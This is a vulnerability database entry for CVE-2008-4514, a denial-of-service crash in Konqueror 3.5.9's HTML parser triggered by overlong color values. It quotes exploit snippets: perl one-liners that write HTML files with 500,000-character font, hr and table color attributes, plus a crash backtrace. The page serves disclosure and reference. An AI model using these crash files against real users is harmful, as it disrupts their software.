Published: 09/10/2008 Updated: 29/09/2017

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

VMScore: 510

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

The HTML parser in KDE Konqueror 3.5.9 allows remote malicious users to cause a denial of service (application crash) via a font tag with a long color value, which triggers an assertion error.

Vulnerable Product	Search on Vulmon	Subscribe to Product
konqueror konqueror 3.5.9

KDE's Konqueror & Color Attribute Love perl -e 'print "<html>\n" "<font color=" "A" x 500000 ">\n</html>"' > kdiehtml perl -e 'print "<html>\n" "<hr color=" "A" x 500000 ">\n</html>"' > kdie2html perl -e 'print "<html>\n" "<table bgcolor=" "A" x 500000 ">\n</html>" ...

Konqueror isn't immune from fuzzing either Konqueror, KDE's mighty mascot browser fuzzed perl -e 'print "<html>\n" "<font color=" "A" x 500000 "\n</html>"' > kdiehtml #6 0xb7f8d410 in __kernel_vsyscall () #7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libcso6 #8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc ...

CWE-20 http://www.securityfocus.com/bid/31605 http://securityreason.com/securityalert/4394 https://www.exploit-db.com/exploits/6689 https://nvd.nist.gov https://www.exploit-db.com/exploits/6704/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-4514

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect